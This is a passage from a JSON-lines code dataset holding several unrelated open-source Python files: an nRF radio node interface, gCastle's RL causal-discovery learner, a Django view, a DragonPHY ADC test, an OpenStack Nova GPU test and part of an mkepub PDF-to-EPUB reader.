incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetRemoteNodeData(self, port, node_id, sensor_index):\n\t\tpayload = [self.Commands.OPCODE_GET_NODES_DATA, 1, sensor_index]\n\t\tpacket = self.Commands.ReadRemoteCommand(node_id, payload)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\t\t\n\t\tif len(packet) > 0:\n\t\t\tif packet[1] == self.Commands.OPCODE_RX_DATA:\n\t\t\t\tif packet[4] == self.Commands.OPCODE_GET_NODES_DATA:\n\t\t\t\t\tnrf_packet = packet[3:]\n\t\t\t\t\treturn {\n\t\t\t\t\t\t'packet': nrf_packet\n\t\t\t\t\t}\n\t\t\t\telse:\n\t\t\t\t\tprint(\"(ERROR) Incorrect answer. {0}\".format(packet))\n\t\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef SetRemoteNodeData(self, port, node_id, sensor_index, sensor_value):\n\t\tarr_value = common.IntToBytes(sensor_value, 4)\n\t\t# arr_value = value.to_bytes(4, 'big')\n\t\tpayload = [self.Commands.OPCODE_SET_NODES_DATA, 5, sensor_index] + arr_value\n\t\tpacket = self.Commands.ReadRemoteCommand(node_id, payload)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\n\t\tif packet is not None and len(packet) > 0:\n\t\t\tif packet[1] == self.Commands.OPCODE_RX_DATA:\n\t\t\t\tif packet[4] == self.Commands.OPCODE_SET_NODES_DATA:\n\t\t\t\t\tnrf_packet = packet[3:]\n\t\t\t\t\treturn {\n\t\t\t\t\t\t'packet': nrf_packet\n\t\t\t\t\t}\n\t\t\t\telse:\n\t\t\t\t\tprint(\"(ERROR) Incorrect answer. {0}\".format(packet))\n\t\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef SetRemoteNodeAddress(self, port, node_id, address):\n\t\t# OPCODE : LEN : PAYLOAD\n\t\tpayload = [self.Commands.OPCODE_SET_ADDRESS, 1, address]\n\t\tpacket = self.Commands.ReadRemoteCommand(node_id, payload)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\t\t\n\t\tif packet is not None and len(packet) > 0:\n\t\t\tif packet[1] == self.Commands.OPCODE_RX_DATA:\n\t\t\t\tif packet[4] == self.Commands.OPCODE_SET_ADDRESS:\n\t\t\t\t\treturn {\n\t\t\t\t\t\t'packet': packet\n\t\t\t\t\t}\n\t\t\t\telse:\n\t\t\t\t\tprint(\"(ERROR) Incorrect answer. {0}\".format(packet))\n\t\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetRemoteNodeAddress(self, port, node_id):\n\t\tpayload = [self.Commands.OPCODE_GET_ADDRESS]\n\t\tpacket = self.Commands.ReadRemoteCommand(node_id, payload)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\n\t\tif packet is not None and len(packet) > 0:\n\t\t\tif packet[1] == self.Commands.OPCODE_RX_DATA:\n\t\t\t\tif packet[4] == self.Commands.OPCODE_GET_ADDRESS:\n\t\t\t\t\treturn {\n\t\t\t\t\t\t'packet': packet\n\t\t\t\t\t}\n\t\t\t\telse:\n\t\t\t\t\tprint(\"(ERROR) Incorrect answer. {0}\".format(packet))\n\t\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n","sub_path":"2020/poc/python/classes/nrf.py","file_name":"nrf.py","file_ext":"py","file_size_in_byte":10310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"630370655","text":"# coding=utf-8\n# Copyright (C) 2021. Huawei Technologies Co., Ltd. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport argparse\nimport platform\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nfrom .data_loader import DataGenerator_read_data\nfrom .models import Actor\nfrom .rewards import get_Reward\nfrom .helpers.tf_utils import set_seed\nfrom .helpers.lambda_utils import BIC_lambdas\nfrom .helpers.analyze_utils import convert_graph_int_to_adj_mat, \\\n graph_prunned_by_coef, graph_prunned_by_coef_2nd\n\nfrom castle.common import BaseLearner, Tensor\nfrom castle.metrics import MetricsDAG\n\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')\n\n\nclass RL(BaseLearner):\n \"\"\"\n RL Algorithm.\n A classic causal discovery algorithm based on conditional independence tests.\n\n Parameters\n ----------\n encoder_type: str\n type of encoder used\n hidden_dim: int\n actor LSTM num_neurons\n num_heads: int\n actor input embedding\n num_stacks: int\n actor LSTM num_neurons\n residual: bool\n whether to use residual for gat encoder\n decoder_type: str\n type of decoder used\n decoder_activation: str\n activation for decoder\n decoder_hidden_dim: int\n hidden dimension for decoder\n use_bias: bool\n Whether to add bias term when calculating decoder logits\n use_bias_constant: bool\n Whether to add bias term as CONSTANT when calculating decoder logits\n bias_initial_value: float\n Initial value for bias term when calculating decoder logits\n batch_size: int\n batch size for training\n input_dimension: int\n dimension of reshaped vector\n normalize: bool\n whether the inputdata shall be normalized\n transpose: bool\n whether the true graph needs transposed\n score_type: str\n score functions\n reg_type: str\n regressor type (in combination wth score_type)\n lambda_iter_num: int\n how often to update lambdas\n lambda_flag_default: bool\n with set lambda parameters; true with default strategy and ignore input bounds\n score_bd_tight: bool\n if bound is tight, then simply use a fixed value, rather than the adaptive one\n lambda1_update: float\n increasing additive lambda1\n lambda2_update: float\n increasing multiplying lambda2\n score_lower: float\n lower bound on lambda1\n score_upper: float\n upper bound on lambda1\n lambda2_lower: float\n lower bound on lambda2\n lambda2_upper: float\n upper bound on lambda2\n seed: int\n seed\n nb_epoch: int\n nb epoch\n lr1_start: float\n actor learning rate\n lr1_decay_step: int\n lr1 decay step\n lr1_decay_rate: float\n lr1 decay rate\n alpha: float\n update factor moving average baseline\n init_baseline: float\n initial baseline - REINFORCE\n temperature: float\n pointer_net initial temperature\n C: float\n pointer_net tan clipping\n l1_graph_reg: float\n L1 graph regularization to encourage sparsity\n inference_mode: bool\n switch to inference mode when model is trained\n verbose: bool\n print detailed logging or not\n\n Attributes\n ----------\n causal_matrix : numpy.ndarray\n Learned causal structure matrix\n\n References\n ----------\n https://arxiv.org/abs/1906.04477\n\n Examples\n --------\n >>> from castle.algorithms import RL\n >>> from castle.datasets import load_dataset\n >>> from castle.common import GraphDAG\n >>> from castle.metrics import MetricsDAG\n >>> true_dag, X = load_dataset(name='iid_test')\n >>> n = RL(lambda_flag_default=True)\n >>> n.learn(X, dag=true_dag)\n >>> GraphDAG(n.causal_matrix, true_dag)\n >>> met = MetricsDAG(n.causal_matrix, true_dag)\n >>> print(met.metrics)\n \"\"\"\n \n def __init__(self, encoder_type='TransformerEncoder', \n hidden_dim=64, \n num_heads=16, \n num_stacks=6, \n residual=False, \n decoder_type='SingleLayerDecoder', \n decoder_activation='tanh', \n decoder_hidden_dim=16, \n use_bias=False, \n use_bias_constant=False, \n bias_initial_value=False, \n batch_size=64, \n input_dimension=64, \n normalize=False, \n transpose=False, \n score_type='BIC', \n reg_type='LR', \n lambda_iter_num=1000, \n lambda_flag_default=False, \n score_bd_tight=False, \n lambda1_update=1.0, \n lambda2_update=10, \n score_lower=0.0, \n score_upper=0.0, \n lambda2_lower=-1.0, \n lambda2_upper=-1.0, \n seed=8, \n nb_epoch=20000, \n lr1_start=0.001,\n lr1_decay_step=5000, \n lr1_decay_rate=0.96, \n alpha=0.99, \n init_baseline=-1.0, \n temperature=3.0, \n C=10.0, \n l1_graph_reg=0.0, \n inference_mode=True, \n verbose=False):\n\n super().__init__()\n\n parser = argparse.ArgumentParser(description='Configuration')\n self.config = parser.parse_args(args=[])\n self.config.encoder_type = encoder_type\n self.config.hidden_dim = hidden_dim\n self.config.num_heads = num_heads\n self.config.num_stacks = num_stacks\n self.config.residual = residual\n self.config.decoder_type = decoder_type\n self.config.decoder_activation = decoder_activation\n self.config.decoder_hidden_dim = decoder_hidden_dim\n self.config.use_bias = use_bias\n self.config.use_bias_constant = use_bias_constant\n self.config.bias_initial_value = bias_initial_value\n self.config.batch_size = batch_size\n self.config.input_dimension = input_dimension\n self.config.normalize = normalize\n self.config.transpose = transpose\n self.config.score_type = score_type\n self.config.reg_type = reg_type\n self.config.lambda_iter_num = lambda_iter_num\n self.config.lambda_flag_default = lambda_flag_default\n self.config.score_bd_tight = score_bd_tight\n self.config.lambda1_update = lambda1_update\n self.config.lambda2_update = lambda2_update\n self.config.score_lower = score_lower\n self.config.score_upper = score_upper\n self.config.lambda2_lower = lambda2_lower\n self.config.lambda2_upper = lambda2_upper\n self.config.seed = seed\n self.config.nb_epoch = nb_epoch\n self.config.lr1_start = lr1_start\n self.config.lr1_decay_step = lr1_decay_step\n self.config.lr1_decay_rate = lr1_decay_rate\n self.config.alpha = alpha\n self.config.init_baseline = init_baseline\n self.config.temperature = temperature\n self.config.C = C\n self.config.l1_graph_reg = l1_graph_reg\n self.config.inference_mode = inference_mode\n self.config.verbose = verbose\n\n def learn(self, data, dag=None):\n \"\"\"\n Set up and run the RL algorithm.\n\n Parameters\n ----------\n data: castle.Tensor or numpy.ndarray\n The castle.Tensor or numpy.ndarray format data you want to learn.\n \"\"\"\n config = self.config\n if dag is not None:\n config.dag = dag\n\n if isinstance(data, np.ndarray):\n X = data\n elif isinstance(data, Tensor):\n X = data.data\n else:\n raise TypeError('The type of data must be '\n 'Tensor or numpy.ndarray, but got {}'\n .format(type(data)))\n \n config.data_size = X.shape[0]\n config.max_length = X.shape[1]\n\n causal_matrix = self._rl(X, config)\n self.causal_matrix = causal_matrix\n\n def _rl(self, X, config):\n # Reproducibility\n set_seed(config.seed)\n\n logging.info('Python version is {}'.format(platform.python_version()))\n\n # input data\n if hasattr(config, 'dag'):\n training_set = DataGenerator_read_data(\n X, config.dag, config.normalize, config.transpose)\n else:\n training_set = DataGenerator_read_data(\n X, None, config.normalize, config.transpose)\n\n # set penalty weights\n score_type = config.score_type\n reg_type = config.reg_type\n\n if config.lambda_flag_default: \n sl, su, strue = BIC_lambdas(training_set.inputdata, None, None, None, reg_type, score_type)\n lambda1 = 0\n lambda1_upper = 5\n lambda1_update_add = 1\n lambda2 = 1/(10**(np.round(config.max_length/3)))\n lambda2_upper = 0.01\n lambda2_update_mul = 10\n lambda_iter_num = config.lambda_iter_num\n\n # test initialized score\n logging.info('Original sl: {}, su: {}, strue: {}'.format(sl, su, strue))\n logging.info('Transfomed sl: {}, su: {}, lambda2: {}, true: {}'.format(sl, su, lambda2,\n (strue-sl)/(su-sl)*lambda1_upper)) \n else:\n # test choices for the case with mannualy provided bounds\n # not fully tested\n sl = config.score_lower\n su = config.score_upper\n if config.score_bd_tight:\n lambda1 = 2\n lambda1_upper = 2\n else:\n lambda1 = 0\n lambda1_upper = 5\n lambda1_update_add = 1\n lambda2 = 1/(10**(np.round(config.max_length/3)))\n lambda2_upper = 0.01\n lambda2_update_mul = config.lambda2_update\n lambda_iter_num = config.lambda_iter_num\n\n # actor\n actor = Actor(config)\n callreward = get_Reward(actor.batch_size, config.max_length, \n actor.input_dimension, training_set.inputdata,\n sl, su, lambda1_upper, score_type, reg_type, \n config.l1_graph_reg, False)\n logging.info('Finished creating training dataset, actor model and reward class')\n\n logging.info('Starting session...')\n sess_config = tf.ConfigProto(log_device_placement=False)\n sess_config.gpu_options.allow_growth = True\n\n with tf.Session(config=sess_config) as sess:\n # Run initialize op\n sess.run(tf.global_variables_initializer())\n\n # Test tensor shape\n logging.info('Shape of actor.input: {}'.format(sess.run(tf.shape(actor.input_))))\n\n # Initialize useful variables\n rewards_avg_baseline = []\n rewards_batches = []\n reward_max_per_batch = []\n \n lambda1s = []\n lambda2s = []\n \n graphss = []\n probsss = []\n max_rewards = []\n max_reward = float('-inf')\n max_reward_score_cyc = (lambda1_upper+1, 0)\n\n logging.info('Starting training.')\n \n for i in (range(1, config.nb_epoch + 1)):\n\n if config.verbose:\n logging.info('Start training for {}-th epoch'.format(i))\n\n input_batch = training_set.train_batch(actor.batch_size, actor.max_length, actor.input_dimension)\n graphs_feed = sess.run(actor.graphs, feed_dict={actor.input_: input_batch})\n reward_feed = callreward.cal_rewards(graphs_feed, lambda1, lambda2)\n\n # max reward, max reward per batch\n max_reward = -callreward.update_scores([max_reward_score_cyc], lambda1, lambda2)[0]\n max_reward_batch = float('inf')\n max_reward_batch_score_cyc = (0, 0)\n\n for reward_, score_, cyc_ in reward_feed:\n if reward_ < max_reward_batch:\n max_reward_batch = reward_\n max_reward_batch_score_cyc = (score_, cyc_)\n \n max_reward_batch = -max_reward_batch\n\n if max_reward < max_reward_batch:\n max_reward = max_reward_batch\n max_reward_score_cyc = max_reward_batch_score_cyc\n\n # for average reward per batch\n reward_batch_score_cyc = np.mean(reward_feed[:,1:], axis=0)\n\n if config.verbose:\n logging.info('Finish calculating reward for current batch of graph')\n\n # Get feed dict\n feed = {actor.input_: input_batch, actor.reward_: -reward_feed[:,0], actor.graphs_:graphs_feed}\n\n summary, base_op, score_test, probs, graph_batch, reward_batch, \\\n reward_avg_baseline, train_step1, train_step2 = sess.run( \\\n [actor.merged, actor.base_op, actor.test_scores, \\\n actor.log_softmax, actor.graph_batch, actor.reward_batch, \\\n actor.avg_baseline, actor.train_step1, actor.train_step2], \\\n feed_dict=feed)\n\n if config.verbose:\n logging.info('Finish updating actor and critic network using reward calculated')\n \n lambda1s.append(lambda1)\n lambda2s.append(lambda2)\n\n rewards_avg_baseline.append(reward_avg_baseline)\n rewards_batches.append(reward_batch_score_cyc)\n reward_max_per_batch.append(max_reward_batch_score_cyc)\n\n graphss.append(graph_batch)\n probsss.append(probs)\n max_rewards.append(max_reward_score_cyc)\n\n # logging\n if i == 1 or i % 500 == 0:\n logging.info('[iter {}] reward_batch: {:.4}, max_reward: {:.4}, max_reward_batch: {:.4}'.format(i,\n reward_batch, max_reward, max_reward_batch))\n\n # update lambda1, lamda2\n if i == 1 or i % lambda_iter_num == 0:\n ls_kv = callreward.update_all_scores(lambda1, lambda2)\n\n graph_int, score_min, cyc_min = np.int32(ls_kv[0][0]), ls_kv[0][1][1], ls_kv[0][1][-1]\n\n if cyc_min < 1e-5:\n lambda1_upper = score_min\n lambda1 = min(lambda1+lambda1_update_add, lambda1_upper)\n lambda2 = min(lambda2*lambda2_update_mul, lambda2_upper)\n logging.info('[iter {}] lambda1 {:.4}, upper {:.4}, lambda2 {:.4}, upper {:.4}, score_min {:.4}, cyc_min {:.4}'.format(i,\n lambda1*1.0, lambda1_upper*1.0, lambda2*1.0, lambda2_upper*1.0, score_min*1.0, cyc_min*1.0))\n\n graph_batch = convert_graph_int_to_adj_mat(graph_int)\n\n if reg_type == 'LR':\n graph_batch_pruned = np.array(graph_prunned_by_coef(graph_batch, training_set.inputdata))\n elif reg_type == 'QR':\n graph_batch_pruned = np.array(graph_prunned_by_coef_2nd(graph_batch, training_set.inputdata))\n\n if hasattr(config, 'dag'):\n met = MetricsDAG(graph_batch.T, training_set.true_graph)\n met2 = MetricsDAG(graph_batch_pruned.T, training_set.true_graph)\n acc_est = met.metrics\n acc_est2 = met2.metrics\n\n fdr, tpr, fpr, shd, nnz = \\\n acc_est['fdr'], acc_est['tpr'], acc_est['fpr'], \\\n acc_est['shd'], acc_est['nnz']\n fdr2, tpr2, fpr2, shd2, nnz2 = \\\n acc_est2['fdr'], acc_est2['tpr'], acc_est2['fpr'], \\\n acc_est2['shd'], acc_est2['nnz']\n \n logging.info('before pruning: fdr {}, tpr {}, fpr {}, shd {}, nnz {}'.format(fdr, tpr, fpr, shd, nnz))\n logging.info('after pruning: fdr {}, tpr {}, fpr {}, shd {}, nnz {}'.format(fdr2, tpr2, fpr2, shd2, nnz2))\n\n plt.figure(1)\n plt.plot(rewards_batches, label='reward per batch')\n plt.plot(max_rewards, label='max reward')\n plt.legend()\n plt.savefig('reward_batch_average.png')\n plt.close()\n \n logging.info('Training COMPLETED !')\n\n return graph_batch_pruned.T\n","sub_path":"gcastle/castle/algorithms/gradient/rl/rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":17224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"514172145","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\n\nfrom .models import UserMessage\nimport re\n# Create your views here.\n\ndef getform(request):\n # return render(request,'message_form.html')\n\n #UserMessage默认的数据管理器是objects\n #方法all()将所有数据返回成一个queryset类型\n\n full_path = request.get_full_path()\n r = re.search('\\?(\\w)=(\\d{4})&(\\w)=(\\d{4})&(\\w{2})=(\\d)&(\\w)=(\\d)&(\\w{2})=(\\d{7})',full_path).groups()\n sn = ''\n for i in r:\n sn += i\n sn = sn.upper()\n # print(sn)\n message = UserMessage.objects.get(serial_num=sn)\n return render(request,'message_form.html',{'my_message': message})","sub_path":"apps/message/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"535041892","text":"# general imports\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\nfrom pathlib import Path\n\n# DragonPHY imports\nfrom dragonphy import *\n\nTHIS_DIR = Path(__file__).parent.resolve()\nBUILD_DIR = THIS_DIR / 'build'\n\ndef test_sim(dump_waveforms):\n deps = get_deps_cpu_sim(impl_file=THIS_DIR / 'test.sv')\n print(deps)\n\n def qwrap(s):\n return f'\"{s}\"'\n\n defines = {\n 'TI_ADC_TXT': qwrap(BUILD_DIR / 'ti_adc.txt'),\n 'RX_INPUT_TXT': qwrap(BUILD_DIR / 'rx_input.txt'),\n 'WIDTH_TXT': qwrap(BUILD_DIR / 'width.txt')\n }\n\n DragonTester(\n ext_srcs=deps,\n directory=BUILD_DIR,\n defines=defines,\n dump_waveforms=dump_waveforms\n ).run()\n\n x = np.loadtxt(BUILD_DIR / 'rx_input.txt', dtype=float)\n\n y = np.loadtxt(BUILD_DIR / 'ti_adc.txt', dtype=int, delimiter=',')\n y = y.flatten()\n\n widths = np.loadtxt(BUILD_DIR / 'width.txt', dtype=float, delimiter=',')\n widths = widths.flatten()\n\n # make sure that length of y is an integer multiple of length of x\n assert len(y) % len(x) == 0, \\\n 'Number of ADC codes must be an integer multiple of the number of input samples.'\n\n # repeat input as necessary\n num_repeat = len(y) // len(x)\n x = np.repeat(x, num_repeat)\n\n assert len(x) == len(y), \\\n 'Lengths of x and y should match at this point.'\n\n plot_data(x, y, widths)\n check_data(x, y)\n\ndef plot_data(x, y, widths):\n plt.plot(x, y, '*')\n plt.xlabel('Differential input voltage')\n plt.ylabel('ADC Code')\n plt.savefig(BUILD_DIR / 'dc.eps')\n plt.cla()\n plt.clf()\n\n plt.plot(x, widths*1e12, '*')\n plt.xlabel('Differential input voltage')\n plt.ylabel('PFD Out Width (ps)')\n plt.savefig(BUILD_DIR / 'widths.eps')\n plt.cla()\n plt.clf()\n\ndef check_data(x, y, inl_limit=5, offset_limit=2.5, gain_bnds=(240, 300)):\n # compute linear regression\n regr = linear_model.LinearRegression()\n regr.fit(x[:, np.newaxis], y)\n\n # INL\n y_fit = regr.predict(x[:, np.newaxis])\n inl = np.max(np.abs(y - y_fit))\n assert inl <= inl_limit, f'INL out of spec: {inl}.'\n print(f'INL OK: {inl}')\n\n # offset\n offset = regr.intercept_\n assert -offset_limit <= offset <= offset_limit, f'Offset out of spec: {offset}.'\n print(f'Offset OK: {offset}')\n\n # gain\n gain = regr.coef_[0]\n assert min(gain_bnds) <= gain <= max(gain_bnds), f'Gain out of spec: {gain} LSB/Volt.'\n print(f'Gain OK: {gain} LSB/Volt.')\n","sub_path":"tests/cpu_system_tests/dc/test_dc.py","file_name":"test_dc.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"566171239","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n#\n# Copyright 2010 OpenStack LLC\n# Copyright 2012 University Of Minho\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport errno\nimport os\nimport shutil\n\nfrom nova.compute import instance_types\nfrom nova import context\nfrom nova import db\nfrom nova import exception\nfrom nova import flags\nfrom nova.openstack.common import importutils\nfrom nova.openstack.common import log as logging\nfrom nova import test\nfrom nova import utils\nfrom nova.virt.gpu import driver as gpulibvirt_driver\nfrom nova.virt.gpu import utils as gpu_utils\n\nfrom nova.virt.libvirt import driver as libvirt_driver\n\ntry:\n import libvirt\nexcept ImportError:\n import nova.tests.fakelibvirt as libvirt\nlibvirt_driver.libvirt = libvirt\n\n\nFLAGS = flags.FLAGS\nLOG = logging.getLogger(__name__)\n\n\nCOMMON_FLAGS = dict(\n \n instance_type_extra_specs=['cpu_arch:x86_64',\n 'gpus:1', 'gpu_arch:fermi', \n 'hypervisor_type:LXC'],\n libvirt_type='lxc',\n dev_cgroups_path='/test/cgroup'\n)\n\n\nclass GPULibvirtDriverTestCase(test.TestCase):\n \"\"\"Test for nova.virt.gpu.gpulibvirt_driver.LibvirtDriver.\"\"\"\n def setUp(self):\n super(GPULibvirtDriverTestCase, self).setUp()\n\n self.flags(**COMMON_FLAGS)\n self.flags(fake_call=True)\n self.user_id = 'fake'\n self.project_id = 'fake'\n self.context = context.get_admin_context()\n self.gpulibvirtconnection = gpulibvirt_driver.GPULibvirtDriver(read_only=True)\n self.root_fs = './test-gpu'\n self.cgroup_path = self.root_fs + '/cgroup/fake'\n self.etc_path = self.root_fs + '/etc'\n flavor_id = instance_types.get_instance_type_by_name('m1.small')\\\n ['flavorid']\n extra_specs = {}\n extra_specs['cpu_arch'] = 's== x86_64'\n extra_specs['gpus'] = '= 1'\n extra_specs['gpu_arch'] = 's== fermi'\n extra_specs['hypervisor_type'] = 's== LXC'\n\n db.instance_type_extra_specs_update_or_create(\n context.get_admin_context(), flavor_id,extra_specs)\n\n def tearDown(self):\n super(GPULibvirtDriverTestCase, self).tearDown()\n \n inst_meta = {'gpus': 1} \n test_instance = {'memory_kb': '1024000',\n 'basepath': '/some/path',\n 'bridge_name': 'br100',\n 'vcpus': 2,\n 'name' : 'fake',\n 'project_id': 'fake',\n 'bridge': 'br101',\n 'image_ref': '155d900f-4e14-4e4c-a73d-069cbf4541e6',\n 'root_gb': 10,\n 'ephemeral_gb': 20,\n 'metadata': inst_meta,\n 'instance_type_id': '5'} # m1.small\n\n def testInitGPU(self):\n extra_specs = gpu_utils.get_instance_type_extra_specs_capabilities()\n init_gpus = extra_specs['gpus']\n self.assertEquals(1, int(init_gpus))\n self.assertEquals(1, gpu_utils.get_gpu_total())\n\n def testAssignDeassignGPU(self):\n if os.path.isdir(self.root_fs):\n shutil.rmtree(self.root_fs)\n os.makedirs(self.cgroup_path)\n os.makedirs(self.etc_path)\n gpu_utils.assign_gpus(self.context, self.test_instance, \n self.root_fs)\n self.assertEquals(0, gpu_utils.get_gpu_total())\n \n gpu_utils.deassign_gpus(self.test_instance)\n self.assertEquals(1, gpu_utils.get_gpu_total())\n shutil.rmtree(self.root_fs)\n \n def testOverAllocationGPU(self):\n if os.path.isdir(self.root_fs):\n shutil.rmtree(self.root_fs)\n os.makedirs(self.cgroup_path)\n os.makedirs(self.etc_path)\n gpu_utils.assign_gpus(self.context, self.test_instance,self.root_fs)\n try:\n gpu_utils.assign_gpus(self.context, self.test_instance, \n self.root_fs)\n except Exception as Exn:\n gpu_utils.deassign_gpus(self.test_instance)\n shutil.rmtree(self.root_fs)\n return\n shutil.rmtree(self.root_fs)\n assert false, \"Cannot detect over-allocation\"\n\n","sub_path":"nova/tests/test_gpu.py","file_name":"test_gpu.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"510319157","text":"#! /usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport logging\r\nimport os\r\nimport subprocess\r\n\r\nfrom glob import glob\r\nfrom shutil import rmtree\r\nfrom tempfile import mkdtemp\r\n\r\nfrom PyPDF2 import PdfFileReader\r\nfrom ebooklib import epub\r\n\r\nfrom . import COVER_SUFFIX\r\n\r\nCMD_PDF2HTML = ['tools/pdf2html/pdf2htmlEx.exe',\r\n '--split-pages', '1', '--printing', '0',\r\n '--tounicode', '0', '--process-outline', '0',\r\n '--embed-css', '0', '--embed-font', '0',\r\n '--embed-javascript', '1', '--embed-image', '0',\r\n '--css-filename', 'epub.css', '--bg-format', 'jpg',\r\n '--page-filename', 'chapter%02d.xhtml']\r\n\r\nPREV_TEMPLATE = '''
'''\r\nNEXT_TEMPLATE = '''
\r\n\r\n\r\n\r\n\r\n
'''\r\n\r\nlogger = logging.getLogger('mkepub.pdfreader2')\r\n\r\n\r\ndef get_num_pages(filename):\r\n with open(filename, 'rb') as f:\r\n r = PdfFileReader(f, strict=False)\r\n return r.getNumPages()\r\n\r\n\r\nclass PdfReader:\r\n\r\n def __init__(self):\r\n self._filename = None\r\n self._workpath = []\r\n\r\n def is_support(self, ext):\r\n return ext in ('.pdf',)\r\n\r\n def get_template(self):\r\n return None\r\n\r\n def _get_content(self, styles, pages):\r\n path = os.path.dirname(__file__)\r\n filename = os.path.join(path, '..', 'templates', 'pdf_frame.html')\r\n with open(filename, 'r') as f:\r\n return f.read() \\\r\n .replace('%CSS_LINKS%', ''.join(styles)) \\\r\n .replace('%PAGES%', ''.join(pages))\r\n\r\n def get_cover(self):\r\n cover = os.path.join(self._filename[:-4] + COVER_SUFFIX)\r\n return cover if os.path.exists(cover) else None\r\n\r\n def open(self, filename):\r\n n = get_num_pages(filename)\r\n\r\n batch = 30\r\n logger.info('Total pages: %s', n)\r\n for i in range(1, n, batch):\r\n p = mkdtemp(prefix='mkepub_', suffix='_pdf')\r\n self._workpath.append(p)\r\n\r\n j = i + batch - 1\r\n logger.info('Convert pages from %d to %d', i, j)\r\n logger.info('Target path: %s', p)\r\n\r\n args = ['--dest-dir', p, '-f', str(i), '-l', str(j), filename]\r\n cmdlist = CMD_PDF2HTML + args\r\n\r\n logger.info('Run command: %s', ' '.join(cmdlist))\r\n p = subprocess.Popen(cmdlist)\r\n p.communicate()\r\n\r\n if p.returncode != 0:\r\n raise RuntimeError('转换失败,pdf2htmlEx 出错')\r\n logger.info('Convert page %d to %d OK', i, j)\r\n self._filename = filename\r\n\r\n def close(self):\r\n self._filename = None\r\n for p in self._workpath:\r\n rmtree(p)\r\n self._workpath = []\r\n\r\n def get_metadata(self):\r\n return {}\r\n\r\n def get_toc(self):\r\n return self._toc\r\n\r\n def images(self):\r\n for p in self._workpath:\r\n for filename in glob(os.path.join(p, '*.jpg')):\r\n name = os.path.basename(filename)\r\n with open(filename, 'rb') as f:\r\n yield epub.EpubItem(uid=name,\r\n file_name=\"Text/%s\" % name,\r\n media_type=\"images/jpg\",\r\n content=f.read())\r\n\r\n def stylesheets(self):\r\n n = 0\r\n for p in self._workpath:\r\n for filename in glob(os.path.join(p, '*.css')):\r\n name = str(n) + '/' + os.path.basename(filename)\r\n with open(filename, \"rb\") as f:\r\n yield epub.EpubItem(uid=name,\r\n file_name=\"Styles/%s\" % name,\r\n media_type=\"text/css\",\r\n content=f.read())\r\n n += 1\r\n\r\n def contents(self):\r\n if not self._workpath:\r\n return\r\n self._toc = []\r\n\r\n def _page_name(i):\r\n return \"pdf_frame%s.html\" % (str(i) if i else '')\r\n\r\n n = len(self._workpath)\r\n for i in range(n):\r\n p = self._workpath[i]\r\n for filename in glob(os.path.join(p, '*.html')):\r\n with open(filename, 'r') as f:\r\n content = f.read()\r\n m = 'link rel=\"stylesheet\" href=\"'\r\n s = '../Styles/%d/' % i\r\n content = content.replace(m, m+s)\r\n if i:\r\n m = '
'\r\n s = PREV_TEMPLATE % _page_name(i-1)\r\n content = content.replace(m, m+s)\r\n if i < n - 1:\r\n m = '
\\n
